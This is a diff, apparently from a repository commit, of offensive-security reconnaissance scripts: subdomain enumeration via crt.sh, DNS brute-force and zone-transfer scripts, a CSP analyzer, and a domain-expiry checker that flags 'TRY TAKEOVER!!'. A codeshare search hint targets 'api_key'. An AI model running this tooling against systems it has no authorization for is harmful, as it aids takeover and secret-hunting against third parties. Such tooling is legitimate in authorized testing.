    484  - print( colored("Status=%d, Length=%d, Headers=%d, Content-Type=%s" % (r_reference.status_code,len(r_reference.content),len(r_reference.headers),r_reference.headers['Content-Type']), 'cyan') )
    485  - print( "[+] Testing bypass..." )
    486  - t_threads = []
    487  - for ip in t_ips_notcloudflare:
    488  - testBypass( r_reference, ip, host )
    489  - 
  • ■ ■ ■ ■
    codeshare.php
    skipped 194 lines
    195 195   echo "Options:\n";
    196 196   echo "\t-s\tstring to search\n";
    197 197   echo "\t-t\tthreads, default 10\n";
    198  - echo "\nRecommended: php codeshare.php -s api_key -t 50";
     198 + echo "\nRecommended: php codeshare.php -s 'tesla.com' -t 50";
    199 199   echo "\n";
    200 200   if( $err ) {
    201 201   echo 'Error: '.$err."!\n";
    skipped 4 lines
  • ■ ■ ■ ■ ■ ■
    cors.py
    1 1  #!/usr/bin/python3
    2 2   
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6 3  import os
    7 4  import sys
    8 5  import re
    skipped 314 lines
  • ■ ■ ■ ■ ■ ■
    crlf.py
    1 1  #!/usr/bin/python3
    2 2   
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6 3  import os
    7 4  import sys
    8 5  import re
    skipped 502 lines
  • ■ ■ ■ ■ ■ ■
    crtsh.php
    1 1  #!/usr/bin/php
    2 2  <?php
    3 3   
    4  -function isSubdomain( $str )
    5  -{
    6  - $str = strtolower( $str );
     4 +// function isSubdomain( $str )
     5 +// {
     6 +// $str = strtolower( $str );
    7 7   
    8  - if( preg_match('/[^0-9a-z_\-\.]/',$str) || preg_match('/[^0-9a-z]/',$str[0]) || preg_match('/[^a-z]/',$str[strlen($str)-1]) || substr_count($str,'.')<2 ) {
    9  - return false;
    10  - } else {
    11  - return true;
    12  - }
    13  -}
     8 +// if( preg_match('/[^0-9a-z_\-\.]/',$str) || preg_match('/[^0-9a-z]/',$str[0]) || preg_match('/[^a-z]/',$str[strlen($str)-1]) || substr_count($str,'.')<2 ) {
     9 +// return false;
     10 +// } else {
     11 +// return true;
     12 +// }
     13 +// }
    14 14   
    15 15   
    16  -function extractDomain( $host )
    17  -{
    18  - $tmp = explode( '.', $host );
    19  - $cnt = count( $tmp );
     16 +// function extractDomain( $host )
     17 +// {
     18 +// $tmp = explode( '.', $host );
     19 +// $cnt = count( $tmp );
    20 20   
    21  - $domain = $tmp[$cnt-1];
     21 +// $domain = $tmp[$cnt-1];
    22 22   
    23  - for( $i=$cnt-2 ; $i>=0 ; $i-- ) {
    24  - $domain = $tmp[$i].'.'.$domain;
    25  - if( strlen($tmp[$i]) > 3 ) {
    26  - break;
    27  - }
    28  - }
     23 +// for( $i=$cnt-2 ; $i>=0 ; $i-- ) {
     24 +// $domain = $tmp[$i].'.'.$domain;
     25 +// if( strlen($tmp[$i]) > 3 ) {
     26 +// break;
     27 +// }
     28 +// }
    29 29   
    30  - return $domain;
    31  -}
     30 +// return $domain;
     31 +// }
    32 32   
    33 33   
    34 34  function usage( $err=null ) {
    skipped 10 lines
    45 45   
    46 46  $t_host = [];
    47 47  $domain = $_SERVER['argv'][1];
    48  -$src = 'https://crt.sh/?q=%25.'.$domain;
    49  -$html = file_get_contents( $src );
    50  -//echo $html;
    51  - 
    52  -$doc = new DOMDocument();
    53  -$doc->preserveWhiteSpace = false;
    54  -@$doc->loadHTML( $html );
     48 +$src = 'https://crt.sh/?output=json&q=%25.'.$domain;
     49 +$json = file_get_contents( $src );
     50 +if( strlen($json) ) {
     51 + $t_json = json_decode( $json, true);
     52 +}
     53 +// var_dump($t_json);
    55 54   
    56  -$xpath = new DOMXPath( $doc );
    57  -$table = $xpath->query( '//table' );
    58  -//var_dump($table->length);
     55 +$t_subs = [];
     56 +foreach( $t_json as $sub ) {
     57 + if( isset($sub['name_value']) && !in_array($sub['name_value'],$t_subs)) {
     58 + $t_subs[] = $sub['name_value'];
     59 + }
     60 +}
    59 61   
    60  -if( $table->length >= 3 )
    61  -{
    62  - $row = $xpath->query( 'tr', $table[2] );
    63  - //var_dump( $row->length );
     62 +sort($t_subs);
    64 63   
    65  - foreach( $row as $r ) {
    66  - $column = $xpath->query( 'td', $r );
    67  - //var_dump( $column->length );
    68  - if( $column->length == 6 ) {
    69  - $h = str_replace( '*.', '', trim($column[4]->nodeValue) );
    70  - if( isSubdomain($h) && extractDomain($h) == $domain ) {
    71  - $t_host[] = $h;
    72  - }
    73  - }
    74  - }
     64 +foreach( $t_subs as $s ) {
     65 + echo $s."\n";
    75 66  }
    76 67   
    77  -if( count($t_host) )
    78  -{
    79  - $t_host = array_unique( $t_host );
    80  - sort( $t_host );
     68 +exit();
    81 69   
    82  - foreach( $t_host as $h ) {
    83  - echo $h."\n";
    84  - }
    85  -}
     70 +// $doc = new DOMDocument();
     71 +// $doc->preserveWhiteSpace = false;
     72 +// @$doc->loadHTML( $html );
    86 73   
    87  -exit( 0 );
     74 +// $xpath = new DOMXPath( $doc );
     75 +// $table = $xpath->query( '//table' );
     76 +// //var_dump($table->length);
     77 + 
     78 +// if( $table->length >= 3 )
     79 +// {
     80 +// $row = $xpath->query( 'tr', $table[2] );
     81 +// //var_dump( $row->length );
     82 + 
     83 +// foreach( $row as $r ) {
     84 +// $column = $xpath->query( 'td', $r );
     85 +// //var_dump( $column->length );
     86 +// if( $column->length == 6 ) {
     87 +// $h = str_replace( '*.', '', trim($column[4]->nodeValue) );
     88 +// if( isSubdomain($h) && extractDomain($h) == $domain ) {
     89 +// $t_host[] = $h;
     90 +// }
     91 +// }
     92 +// }
     93 +// }
     94 + 
     95 +// if( count($t_host) )
     96 +// {
     97 +// $t_host = array_unique( $t_host );
     98 +// sort( $t_host );
     99 + 
     100 +// foreach( $t_host as $h ) {
     101 +// echo $h."\n";
     102 +// }
     103 +// }
     104 + 
     105 +// exit( 0 );
    88 106   
    89 107  ?>
  • ■ ■ ■ ■ ■ ■
    csp-analyzer.py
    1  -#!/usr/bin/python3
    2  - 
    3  -import sys
    4  -import requests
    5  -import urllib.parse
    6  -from colored import fg, bg, attr
    7  - 
    8  -import tldextract
    9  - 
    10  - 
    11  -def banner():
    12  - print("""
    13  - _
    14  - ___ ___ _ __ __ _ _ __ __ _| |_ _ _______ _ __ _ __ _ _
    15  - / __/ __| '_ \ / _` | '_ \ / _` | | | | |_ / _ \ '__| | '_ \| | | |
    16  - | (__\__ \ |_) | | (_| | | | | (_| | | |_| |/ / __/ | _ | |_) | |_| |
    17  - \___|___/ .__/ \__,_|_| |_|\__,_|_|\__, /___\___|_| (_) | .__/ \__, |
    18  - |_| |___/ |_| |___/
    19  - 
    20  - by @gwendallecoguic
    21  - 
    22  -""")
    23  - pass
    24  - 
    25  -banner()
    26  - 
    27  - 
    28  -# Sources:
    29  -# https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy
    30  -# https://content-security-policy.com/
    31  - 
    32  -t_help = {
    33  - "child-src": "Defines the valid sources for web workers and nested browsing contexts loaded using elements such as <frame> and <iframe>.",
    34  - "connect-src": "Restricts the URLs which can be loaded using script interfaces",
    35  - "default-src": "Serves as a fallback for the other fetch directives.",
    36  - "font-src": "Specifies valid sources for fonts loaded using @font-face.",
    37  - "frame-src": "Specifies valid sources for nested browsing contexts loading using elements such as <frame> and <iframe>.",
    38  - "img-src": "Specifies valid sources of images and favicons.",
    39  - "manifest-src": "Specifies valid sources of application manifest files.",
    40  - "media-src": "Specifies valid sources for loading media using the <audio> , <video> and <track> elements.",
    41  - "object-src": "Specifies valid sources for the <object>, <embed>, and <applet> elements.",
    42  - "prefetch-src": "Specifies valid sources to be prefetched or prerendered.",
    43  - "script-src": "Specifies valid sources for JavaScript.",
    44  - "style-src": "Specifies valid sources for stylesheets.",
    45  - "webrtc-src": "Specifies valid sources for WebRTC connections.",
    46  - "worker-src": "Specifies valid sources for Worker, SharedWorker, or ServiceWorker scripts.",
    47  - 
    48  - "base-uri": "Restricts the URLs which can be used in a document's <base> element.",
    49  - "plugin-types": "Restricts the set of plugins that can be embedded into a document by limiting the types of resources which can be loaded.",
    50  - "sandbox": "Enables a sandbox for the requested resource similar to the <iframe> sandbox attribute.",
    51  - "disown-opener": "Ensures a resource will disown its opener when navigated to.",
    52  - 
    53  - "form-action": "Restricts the URLs which can be used as the target of a form submissions from a given context.",
    54  - "frame-ancestors": "Specifies valid parents that may embed a page using <frame>, <iframe>, <object>, <embed>, or <applet>.",
    55  - "navigate-to": "Restricts the URLs to which a document can navigate by any means (a, form, window.location, window.open, etc.)",
    56  - 
    57  - "report-uri": "Instructs the user agent to report attempts to violate the Content Security Policy. These violation reports consist of JSON documents sent via an HTTP POST request to the specified URI.",
    58  - "report-to": "Fires a SecurityPolicyViolationEvent.",
    59  - 
    60  - "block-all-mixed-content": "Prevents loading any assets using HTTP when the page is loaded using HTTPS.",
    61  - "referrer": "Used to specify information in the referer (sic) header for links away from a page. Use the Referrer-Policy header instead.",
    62  - "require-sri-for": "Requires the use of SRI for scripts or styles on the page.",
    63  - "upgrade-insecure-requests": "Instructs user agents to treat all of a site's insecure URLs (those served over HTTP) as though they have been replaced with secure URLs (those served over HTTPS). This directive is intended for web sites with large numbers of insecure legacy URLs that need to be rewritten.",
    64  - 
    65  - "*": {"t":"Wildcard, allows any URL except data: blob: filesystem: schemes.","c":"red"},
    66  - "'none'": {"t":"Prevents loading resources from any source.","c":"green"},
    67  - "'self'": {"t":"Allows loading resources from the same origin (same scheme, host and port).","c":"green"},
    68  - "data:": {"t":"Allows loading resources via the data scheme (eg Base64 encoded images).","c":"yellow"},
    69  - "blob:": {"t":"Allows loading resources via the blob scheme (eg Base64 encoded images).","c":"yellow"},
    70  - "domain.example.com": {"t":"Allows loading resources from the specified domain name.","c":"green"},
    71  - "*.example.com": {"t":"Allows loading resources from any subdomain under example.com.","c":"green"},
    72  - "https://cdn.com": {"t":"Allows loading resources only over HTTPS matching the given domain.","c":"green"},
    73  - "https:": {"t":"Allows loading resources only over HTTPS on any domain.","c":"green"},
    74  - "'unsafe-inline'": {"t":"Allows use of inline source elements such as style attribute, onclick, or script tag bodies (depends on the context of the source it is applied to) and javascript: URIs.","c":"red"},
    75  - "'unsafe-eval'": {"t":"Allows unsafe dynamic code evaluation such as JavaScript eval()","c":"red"},
    76  - "'nonce-'": {"t":"Allows script or style tag to execute if the nonce attribute value matches the header value. Note that 'unsafe-inline' is ignored if either a hash or nonce value is present in the source list.","c":"green"},
    77  - "'sha256-'": {"t":"Allow a specific script or style to execute if it matches the hash. Doesn't work for javascript: URIs. Note that 'unsafe-inline' is ignored if either a hash or nonce value is present in the source list.","c":"green"},
    78  -}
    79  - 
    80  -t_warning_level = {
    81  - 0: 'white',
    82  - 1: 'cyan',
    83  - 2: 'green',
    84  - 3: 'yellow',
    85  - 4: 'dark_orange',
    86  - 5: 'red',
    87  -}
    88  - 
    89  - 
    90  -def usage( err='' ):
    91  - print( "Usage: %s <url> [<cookies>]" % sys.argv[0] )
    92  - if err:
    93  - print( "Error: %s!" % err )
    94  - sys.exit()
    95  - 
    96  - 
    97  -if len(sys.argv) < 2:
    98  - usage( 'url not found' )
    99  -if len(sys.argv) > 3:
    100  - usage()
    101  - 
    102  -url = sys.argv[1]
    103  -if len(sys.argv) > 2:
    104  - # cookies = sys.argv[2]
    105  - t_cookies = {}
    106  - for c in sys.argv[2].split(';'):
    107  - c = c.strip()
    108  - if len(c):
    109  - i = c.index('=')
    110  - k = c[0:i]
    111  - v = c[i+1:]
    112  - # print(c.index('='))
    113  - # print(k)
    114  - # print(v)
    115  - t_cookies[k] = v
    116  -else:
    117  - t_cookies = {}
    118  -# print(t_cookies)
    119  - 
    120  -if not url.startswith('http'):
    121  - url = 'https://' + url
    122  - 
    123  -# exit()
    124  -print("Calling %s..." % url )
    125  -# r = requests.get( url )
    126  -r = requests.get(url, cookies=t_cookies, allow_redirects=False, headers={'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0'})
    127  -# print(r.headers)
    128  -# print(r.text)
    129  - 
    130  -if 'Content-Security-Policy' not in r.headers:
    131  - usage( 'Content-Security-Policy not found' )
    132  - 
    133  -#print("%s" % r.headers['Content-Security-Policy'] )
    134  -t_csp = r.headers['Content-Security-Policy'].split( ';' )
    135  -#print(" %s" % t_csp )
    136  -print("")
    137  - 
    138  -t_parse_orig = urllib.parse.urlparse( url )
    139  -t_tld_orig = tldextract.extract( t_parse_orig.netloc )
    140  -# print( t_parse_orig )
    141  - 
    142  - 
    143  -def getWarningLevel( t_tld_orig, item ):
    144  - w_level = 0
    145  - 
    146  - if item in t_help:
    147  - return 0
    148  - 
    149  - if not item.startswith('http'):
    150  - item = 'https://'+item
    151  - 
    152  - tmp_parse = urllib.parse.urlparse( item )
    153  - tmp_tld = tldextract.extract( tmp_parse.netloc )
    154  - # print(tmp_parse)
    155  - 
    156  - if tmp_tld.subdomain == t_tld_orig.subdomain and tmp_tld.domain == t_tld_orig.domain and tmp_tld.suffix == t_tld_orig.suffix:
    157  - # same subdomain and domain and tld
    158  - w_level = 1
    159  - elif tmp_tld.domain == t_tld_orig.domain and tmp_tld.suffix == t_tld_orig.suffix:
    160  - # same domain and tld
    161  - w_level = 2
    162  - elif tmp_tld.domain == t_tld_orig.domain:
    163  - # same domain name
    164  - w_level = 3
    165  - else:
    166  - # nothing in common
    167  - w_level = 4
    168  - 
    169  - if '*' in tmp_parse.netloc:
    170  - # it's a wildcard!
    171  - w_level+=1
    172  - 
    173  - return w_level
    174  - 
    175  - 
    176  -for csp in t_csp:
    177  - csp = csp.strip()
    178  - if not len(csp):
    179  - continue
    180  - tmp = csp.split( ' ' )
    181  - policy = tmp.pop( 0 )
    182  - if policy:
    183  - if not len(policy):
    184  - continue
    185  - #sys.stdout.write( " " )
    186  - sys.stdout.write("%s%s%s%s" % (fg('cyan'),attr('reverse'),policy,attr(0)) )
    187  - # sys.stdout.write( colored( "%s" % policy, 'cyan', attrs=['reverse'] ) )
    188  - if policy in t_help:
    189  - sys.stdout.write(" %s[%s]%s" % (fg('light_gray'),t_help[policy],attr(0)))
    190  - # sys.stdout.write( colored( " [%s]" % t_help[policy], 'white' ) )
    191  - sys.stdout.write( "\n" )
    192  - for item in tmp:
    193  - if not len(item):
    194  - continue
    195  - orig_item = item
    196  - if item.startswith("'nonce-"):
    197  - item = "'nonce-'"
    198  - elif item.startswith("'sha256-"):
    199  - item = "'sha256-'"
    200  - if item in t_help:
    201  - color = t_help[item]['c']
    202  - else:
    203  - w_level = getWarningLevel( t_tld_orig, item )
    204  - color = t_warning_level[w_level]
    205  - if color == 'white':
    206  - sys.stdout.write( " + " )
    207  - else:
    208  - sys.stdout.write(" %s + %s" % (fg(color),attr(0)) )
    209  - # sys.stdout.write( colored( " + ", color ) )
    210  - sys.stdout.write( "%s" % orig_item )
    211  - if item in t_help:
    212  - sys.stdout.write( " %s[%s]%s" % (fg(color),t_help[item]['t'],attr(0)) )
    213  - # sys.stdout.write( colored( " [%s]" % t_help[item]['t'], color ) )
    214  - sys.stdout.write( "\n" )
    215  - sys.stdout.write( "\n" )
    216  - 
  • ■ ■ ■ ■ ■ ■
    detectify-modules.py
    1  -#
    2  -# Get CVE list:
    3  -# wget https://cve.mitre.org/data/downloads/allitems.csv
    4  -#
    5  -# Get Detectify modules list:
    6  -# 1/ login on Detectify
    7  -# 2/ Perform the following request:
    8  -# POST /ajax/application_load/50bdd32f114d2e889f29f31e3e79a1ac/
    9  -# with body: navigation[mode]=modules
    10  -# 3/ save the json returned in detectify-modules.json
    11  -#
    12  - 
    13  -import sys
    14  -import json
    15  -import csv
    16  -import re
    17  -import argparse
    18  -from termcolor import colored
    19  - 
    20  -parser = argparse.ArgumentParser()
    21  -parser.add_argument("-s","--search",help="search a specific keyword")
    22  -parser.add_argument("-l","--limit",help="display only n first results")
    23  -parser.add_argument("-d","--detectify",help="display only when a Detectify module is available", action="store_true")
    24  -parser.parse_args()
    25  -args = parser.parse_args()
    26  - 
    27  -if args.search:
    28  - search = args.search
    29  -else:
    30  - search = ''
    31  - 
    32  -if args.limit:
    33  - limit = int(args.limit)
    34  -else:
    35  - limit = 0
    36  - 
    37  -if args.detectify:
    38  - detectify = 1
    39  -else:
    40  - detectify = 0
    41  - 
    42  -def search_module( cve, search, detectify ):
    43  - if search is '' or search.lower() in cve[2].lower():
    44  - for mod in t_modules:
    45  - if cve[0] in mod['moduleName']:
    46  - return [ mod['moduleName'], mod['userName'], mod['dateAdded'] ]
    47  - return 1
    48  - return 0
    49  - 
    50  -with open('detectify-modules.json') as json_file:
    51  - j_detectify = json.load(json_file)
    52  - t_modules = j_detectify['data']['widgets']['AllModulesList']['props']['changed']['modules']
    53  - 
    54  -with open('allitems.csv') as csv_file:
    55  - i = 0
    56  - csv_reader = csv.reader(csv_file, delimiter=',')
    57  - for cve in reversed(list(csv_reader)):
    58  - if "** RESERVED **" not in cve[2]:
    59  - r = search_module( cve, search, detectify )
    60  - if r != 0:
    61  - if detectify == 0 or type(r) is list:
    62  - i = i + 1
    63  - #sys.stdout.write("https://cve.mitre.org/cgi-bin/cvename.cgi?name=%s - %s..." % (cve[0],cve[2][:150]))
    64  - sys.stdout.write("https://cve.mitre.org/cgi-bin/cvename.cgi?name=%s - %s..." % (cve[0],cve[2][:150]))
    65  - if type(r) is list:
    66  - sys.stdout.write( colored(" -> %s - %s - %s" % (r[0],r[1],r[2]),"red") )
    67  - if detectify == 0 or type(r) is list:
    68  - sys.stdout.write("\n")
    69  - if limit and i >= limit:
    70  - break
    71  - 
  • ■ ■ ■ ■ ■ ■
    dnsenum-brute.sh
    1 1  #!/bin/bash
    2 2   
    3 3  function usage() {
    4  - echo "Usage: "$0" <domain> <subdomain_file> [<dns_server>]"
     4 + echo "Usage: "$0" <domain> <wordlist> [<dns_server>]"
    5 5   if [ -n "$1" ] ; then
    6  - echo "Error: "$1"!"
     6 + echo "Error: "$1"!"
    7 7   fi
    8 8   exit
    9 9  }
    skipped 30 lines
  • ■ ■ ■ ■
    dnsenum-bruten.sh
    skipped 2 lines
    3 3  function usage() {
    4 4   echo "Usage: "$0" <prefix> <suffix> [<dns_server>]"
    5 5   if [ -n "$1" ] ; then
    6  - echo "Error: "$1"!"
     6 + echo "Error: "$1"!"
    7 7   fi
    8 8   exit
    9 9  }
    skipped 36 lines
  • ■ ■ ■ ■
    dnsenum-reverse.sh
    skipped 2 lines
    3 3  function usage() {
    4 4   echo "Usage: "$0" <ip> <domain> [<dns_server>]"
    5 5   if [ -n "$1" ] ; then
    6  - echo "Error: "$1"!"
     6 + echo "Error: "$1"!"
    7 7   fi
    8 8   exit
    9 9  }
    skipped 24 lines
  • ■ ■ ■ ■
    dnsenum-reverserange.sh
    skipped 2 lines
    3 3  function usage() {
    4 4   echo "Usage: "$0" <range_file> <domain> [<dns_server>]"
    5 5   if [ -n "$1" ] ; then
    6  - echo "Error: "$1"!"
     6 + echo "Error: "$1"!"
    7 7   fi
    8 8   exit
    9 9  }
    skipped 16 lines
  • ■ ■ ■ ■ ■ ■
    dnsenum-zonetransfer.sh
    skipped 2 lines
    3 3  function usage() {
    4 4   echo "Usage: "$0" <domain>"
    5 5   if [ -n "$1" ] ; then
    6  - echo "Error: "$1"!"
     6 + echo "Error: "$1"!"
    7 7   fi
    8 8   exit
    9 9  }
    skipped 6 lines
    16 16  n=0
    17 17   
    18 18  for server in $(host -t ns $domain |cut -d ' ' -f 4) ; do
    19  - tmp=`host -l $1 $server |grep 'has address' | tr "\n" "|"`
     19 + tmp=`host -l $1 $server | grep 'has address' | tr "\n" "|"`
    20 20   if [ -n "$tmp" ] ; then
    21  - echo $tmp | tr "|" "\n"
    22  - n=1
     21 + echo $tmp | tr "|" "\n"
     22 + n=1
    23 23   fi
    24 24  done
    25 25   
    skipped 6 lines
  • ■ ■ ■ ■ ■ ■
    dnsexpire.py
    1  -#!/usr/bin/python3
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6  -import os
    7  -import sys
    8  -import re
    9  -import socket
    10  -# import whois
    11  -import pythonwhois
    12  -import subprocess
    13  -import argparse
    14  -import tldextract
    15  -from colored import fg, bg, attr
    16  -from datetime import datetime
    17  -from threading import Thread
    18  -from queue import Queue
    19  -from multiprocessing.dummy import Pool
    20  - 
    21  - 
    22  -def banner():
    23  - print("""
    24  - _ _
    25  - __| |_ __ ___ _____ ___ __ (_)_ __ ___ _ __ _ _
    26  - / _` | '_ \/ __|/ _ \ \/ / '_ \| | '__/ _ \ | '_ \| | | |
    27  - | (_| | | | \__ \ __/> <| |_) | | | | __/ _ | |_) | |_| |
    28  - \__,_|_| |_|___/\___/_/\_\ .__/|_|_| \___| (_) | .__/ \__, |
    29  - |_| |_| |___/
    30  - 
    31  - by @gwendallecoguic
    32  - 
    33  -""")
    34  - pass
    35  - 
    36  -banner()
    37  - 
    38  - 
    39  -ALERT_LIMIT = 30
    40  - 
    41  -parser = argparse.ArgumentParser()
    42  -parser.add_argument( "-a","--all",help="also test dead hosts and non alias", action="store_true" )
    43  -parser.add_argument( "-o","--host",help="set host, can be a file or single host" )
    44  -parser.add_argument( "-t","--threads",help="threads, default 10" )
    45  -parser.add_argument( "-v","--verbose",help="display output, can be: 0=everything, 1=only alias, 2=only possible vulnerable, default 1" )
    46  -parser.parse_args()
    47  -args = parser.parse_args()
    48  - 
    49  -if args.threads:
    50  - _threads = int(args.threads)
    51  -else:
    52  - _threads = 10
    53  - 
    54  -if args.verbose:
    55  - _verbose = int(args.verbose)
    56  -else:
    57  - _verbose = 1
    58  - 
    59  -if args.all:
    60  - _testall = True
    61  -else:
    62  - _testall = False
    63  - 
    64  -t_hosts = []
    65  -if args.host:
    66  - if os.path.isfile(args.host):
    67  - fp = open( args.host, 'r' )
    68  - t_hosts = fp.read().strip().split("\n")
    69  - fp.close()
    70  - else:
    71  - t_hosts = [args.host]
    72  - 
    73  -n_host = len(t_hosts)
    74  - 
    75  -if not n_host:
    76  - parser.error( 'hosts list missing' )
    77  - 
    78  -sys.stdout.write( '%s[+] %d hosts loaded: %s%s\n' % (fg('green'),n_host,args.host,attr(0)) )
    79  -sys.stdout.write( '[+] resolving...\n\n' )
    80  - 
    81  - 
    82  -def resolve( host ):
    83  - try:
    84  - cmd = 'host ' + host
    85  - # print(cmd)
    86  - output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
    87  - # print( output )
    88  - except Exception as e:
    89  - # sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    90  - output = ''
    91  - 
    92  - return output
    93  - 
    94  - 
    95  -def getDomain( host ):
    96  - t_host_parse = tldextract.extract( host )
    97  - return t_host_parse.domain + '.' + t_host_parse.suffix
    98  - 
    99  - 
    100  -def getWhois( domain ):
    101  - if not domain in t_whois_history:
    102  - try:
    103  - w = pythonwhois.get_whois( domain )
    104  - # w = whois.whois( domain )
    105  - t_whois_history[ domain ] = w
    106  - except Exception as e:
    107  - sys.stdout.write( "%s[-] error occurred: %s (%s)%s\n" % (fg('red'),e,domain,attr(0)) )
    108  - return False
    109  - 
    110  - return t_whois_history[domain]
    111  - 
    112  - 
    113  -def getExpirationDate( domain ):
    114  - whois = getWhois( domain )
    115  - # print(type(whois))
    116  - 
    117  - if not type(whois) is bool and 'expiration_date' in whois:
    118  - # if type(whois.expiration_date) is list:
    119  - # return whois.expiration_date[0]
    120  - # else:
    121  - # return whois.expiration_date
    122  - if type(whois['expiration_date']) is list:
    123  - return whois['expiration_date'][0]
    124  - else:
    125  - return whois['expiration_date']
    126  - return False
    127  - else:
    128  - return False
    129  - 
    130  - 
    131  -def getColor( expiration_date ):
    132  - # expiration_date = datetime(2019, 12, 29, 6, 56, 55)
    133  - timedelta = expiration_date - datetime.now()
    134  - # print(timedelta)
    135  - 
    136  - if timedelta.days < -1: # to avoid false positive from smart whois who always return the current date
    137  - return 'light_red'
    138  - elif timedelta.days < ALERT_LIMIT:
    139  - return 'light_yellow'
    140  - else:
    141  - return 'light_green'
    142  - 
    143  - 
    144  -def printExpirationDate( domain ):
    145  - expiration_date = getExpirationDate( domain )
    146  - # print(type(expiration_date))
    147  - 
    148  - if type(expiration_date) is datetime:
    149  - color = getColor( expiration_date )
    150  - if color == 'light_red':
    151  - alert = 'TRY TAKEOVER!!'
    152  - elif color == 'light_yellow':
    153  - alert = 'WARNING!'
    154  - else:
    155  - alert = ''
    156  - return '%s%s %s%s\n' % (fg(color),expiration_date,alert,attr(0))
    157  - else:
    158  - return '%serror%s\n' % (fg('red'),attr(0))
    159  - 
    160  - 
    161  -def dnsexpire( host ):
    162  - sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
    163  - t_multiproc['n_current'] = t_multiproc['n_current'] + 1
    164  - output = ''
    165  - 
    166  - resolution = resolve( host )
    167  - if resolution == '':
    168  - is_alias = False
    169  - if not _testall:
    170  - if not _verbose:
    171  - sys.stdout.write( '%s%s doesn\'t resolve%s\n' % (fg('dark_gray'),host,attr(0)) )
    172  - return
    173  - else:
    174  - is_alias = re.findall( r'(.*) is an alias for (.*)\.', resolution );
    175  - # print(is_alias)
    176  - 
    177  - if not _testall and not is_alias:
    178  - if not _verbose:
    179  - sys.stdout.write( '%s%s is not an alias%s\n' % (fg('dark_gray'),host,attr(0)) )
    180  - return
    181  - 
    182  - if _testall:
    183  - domain = getDomain( host )
    184  - output = output + "%s -> %s -> " % (host,domain)
    185  - output = output + printExpirationDate( domain )
    186  - 
    187  - if is_alias:
    188  - for alias in is_alias:
    189  - domain = getDomain( alias[1] )
    190  - output = output + ("%s is an alias for %s -> %s -> " % (alias[0],alias[1],domain))
    191  - output = output + printExpirationDate( domain )
    192  - 
    193  - if _verbose < 2 or ('WARNING' in output or 'TAKEOVER' in output): # remove the "progress:" text
    194  - sys.stdout.write( '%s\n%s' % (' '.rjust(100,' '),output) )
    195  - 
    196  - if not _testall:
    197  - sys.stdout.write( '\n' )
    198  - 
    199  - 
    200  -def doWork():
    201  - while True:
    202  - host = q.get()
    203  - dnsexpire( host )
    204  - q.task_done()
    205  - 
    206  - 
    207  - 
    208  -t_whois_history = {}
    209  -t_multiproc = {
    210  - 'n_current': 0,
    211  - 'n_total': n_host
    212  -}
    213  - 
    214  -q = Queue( _threads*2 )
    215  - 
    216  -for i in range(_threads):
    217  - t = Thread( target=doWork )
    218  - t.daemon = True
    219  - t.start()
    220  - 
    221  -try:
    222  - for host in t_hosts:
    223  - q.put( host )
    224  - q.join()
    225  -except KeyboardInterrupt:
    226  - sys.exit(1)
    227  - 
    228  - 
    229  -sys.stdout.write( '\n%s[+] finished%s\n' % (fg('green'),attr(0)) )
    230  - 
    231  -exit()
    232  - 
    233  - 
  • ■ ■ ■ ■ ■ ■
    dnsreq-alltypes.sh
     1 +#!/bin/bash
     2 + 
     3 + 
     4 +function usage() {
     5 + echo "Usage: "$0" <(sub)domain>"
     6 + if [ -n "$1" ] ; then
     7 + echo "Error: "$1"!"
     8 + fi
     9 + exit
     10 +}
     11 + 
     12 +if [ ! $# -eq 1 ] ; then
     13 + usage
     14 +fi
     15 + 
     16 + 
     17 +t_types=("*" "A" "A6" "AAAA" "AFSDB" "AMTRELAY" "APL" "ATMA" "AVC" "AXFR" "CAA" "CDNSKEY" "CDS" "CERT" "CNAME" "CSYNC" "DHCID" "DLV" "DNAME" "DNSKEY" "DOA" "DS" "EID" "EUI48" "EUI64" "GID" "GPOS" "HINFO" "HIP" "IPSECKEY" "ISDN" "IXFR" "KEY" "KX" "L32" "L64" "LOC" "LP" "MAILA" "MAILB" "MB" "MD" "MF" "MG" "MINFO" "MR" "MX" "NAPTR" "NID" "NIMLOC" "NINFO" "NS" "NSAP" "NSAP-PTR" "NSEC" "NSEC3" "NSEC3PARAM" "NULL" "NXT" "OPENPGPKEY" "OPT" "PTR" "PX" "RKEY" "RP" "RRSIG" "RT" "SIG" "SINK" "SMIMEA" "SOA" "SPF" "SRV" "SSHFP" "TA" "TALINK" "TKEY" "TLSA" "TSIG" "TXT" "UID" "UINFO" "UNSPEC" "URI" "WKS" "X25" "ZONEMD")
     18 + 
     19 +n=0
     20 +i=0
     21 +total=${#t_types[@]}
     22 +domain=$1
     23 +echo "Trying $total types... $domain"
     24 +echo
     25 + 
     26 +host=$(host -t NS $domain)
     27 +# echo "$host"
     28 +has_ns=$(echo "$host" | grep " name server ")
     29 + 
     30 +if [ -n "$has_ns" ] ; then
     31 + ns=$(echo "$host" | awk '{print $NF}' | sed "s/\.$//")
     32 + # echo "$ns"
     33 + 
     34 + for nnss in $(echo "$ns") ; do
     35 + for type in ${t_types[@]} ; do
     36 + rq=`timeout 3 host -4 -W 1 -t "$type" $domain $nnss 2>&1`
     37 + # echo "$rq"
     38 + 
     39 + fail=$(echo "$rq" | egrep "connection timed out|$domain has no|host: invalid type:|FORMERR|REFUSED|SERVFAIL|NOTAUTH|NXDOMAIN")
     40 + if [ ! -n "$fail" ] ; then
     41 + echo "-----------------------------"
     42 + echo "$domain -> $nnss -> $type"
     43 + echo "-----------------------------"
     44 + echo "$rq"
     45 + echo
     46 + echo
     47 + fi
     48 + 
     49 + done
     50 + done
     51 +fi
     52 + 
     53 + 
  • ■ ■ ■ ■ ■ ■
    domain-finder.py
    1  -#!/usr/bin/python3
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6  -import os
    7  -import sys
    8  -import requests
    9  -import argparse
    10  -from colored import fg, bg, attr
    11  - 
    12  -w_blacklist = [ 'privacy', 'redacted', 'dnstination', 'west' ]
    13  - 
    14  -def extractDatas( t_json ):
